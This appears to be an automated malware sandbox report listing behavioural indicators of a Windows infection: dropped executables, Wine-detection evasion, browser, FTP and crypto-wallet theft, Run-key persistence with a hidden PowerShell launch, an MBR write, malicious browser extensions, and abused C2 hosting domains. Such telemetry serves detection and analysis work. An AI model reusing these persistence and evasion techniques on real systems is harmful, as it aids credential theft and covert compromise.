N/A N/A C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe N/A
N/A N/A C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6C80.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\putty\putty.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A
N/A N/A C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\6b4e5c58ea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\6b4e5c58ea.exe" C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1000043001\\volumeinfo.exe'\"" C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\hsUwQAlMU\BRLoOE.dll C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job C:\Windows\SysWOW64\schtasks.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{453a990c-0000-0000-0000-d01200000000} C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936320200006024b221ea3a6910a2dc08002b30309d1d030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936320200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
